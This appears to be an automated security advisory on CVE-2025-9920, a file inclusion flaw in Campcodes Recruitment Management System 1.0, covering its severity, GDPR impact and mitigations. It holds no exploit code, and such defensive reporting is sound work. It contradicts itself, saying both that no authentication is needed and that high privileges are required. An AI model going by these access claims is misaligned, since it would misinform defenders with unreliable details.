CVE-2025-9920 is a file inclusion vulnerability identified in version 1.0 of the Campcodes Recruitment Management System, specifically affecting the /admin/index.php file. The vulnerability arises from improper handling of the 'page' parameter within the include function, allowing an attacker to manipulate this argument to include arbitrary files. This type of vulnerability typically enables an attacker to execute local or remote file inclusion (LFI/RFI), potentially leading to unauthorized code execution, information disclosure, or system compromise. The vulnerability can be exploited remotely without user interaction and does not require authentication, increasing its risk profile. The CVSS 4.0 base score is 5.1, categorized as medium severity, reflecting a network attack vector with low complexity and no user interaction, but requiring high privileges (PR:H). The impact on confidentiality, integrity, and availability is rated low, indicating limited but non-negligible damage potential. No patches or mitigations have been officially released at the time of publication, and although the exploit code has been publicly disclosed, there are no confirmed reports of active exploitation in the wild. The vulnerability's presence in a recruitment management system suggests potential exposure of sensitive personal and organizational data if exploited.

For European organizations using Campcodes Recruitment Management System 1.0, this vulnerability poses a risk of unauthorized access to administrative functions and potentially sensitive recruitment data, including personal identifiable information (PII) of candidates and employees. Exploitation could lead to data leakage, manipulation of recruitment records, or deployment of malicious code within the affected system. Given the GDPR regulations in Europe, any data breach involving personal data could result in significant legal and financial penalties. The medium severity rating suggests that while the vulnerability is not trivially exploitable without elevated privileges, the remote attack vector and lack of user interaction requirements increase the risk. Organizations relying on this system for critical HR functions may face operational disruptions and reputational damage if the vulnerability is exploited. Additionally, attackers could leverage this vulnerability as a foothold for lateral movement within the network, escalating the impact beyond the recruitment system itself.

To mitigate this vulnerability, European organizations should immediately audit their deployment of Campcodes Recruitment Management System and identify any instances running version 1.0. Since no official patch is currently available, organizations should implement compensating controls such as restricting network access to the administrative interface via firewalls or VPNs, limiting exposure to trusted IP addresses only. Input validation and sanitization should be enforced on the 'page' parameter to prevent malicious file inclusion attempts. Employing web application firewalls (WAFs) with rules targeting file inclusion attack patterns can provide additional protection. Monitoring logs for unusual access patterns or attempts to manipulate the 'page' parameter is critical for early detection. Organizations should also plan to upgrade to a patched version once available or consider alternative recruitment management solutions with better security postures. Regular security assessments and penetration testing focused on this vulnerability can help identify residual risks.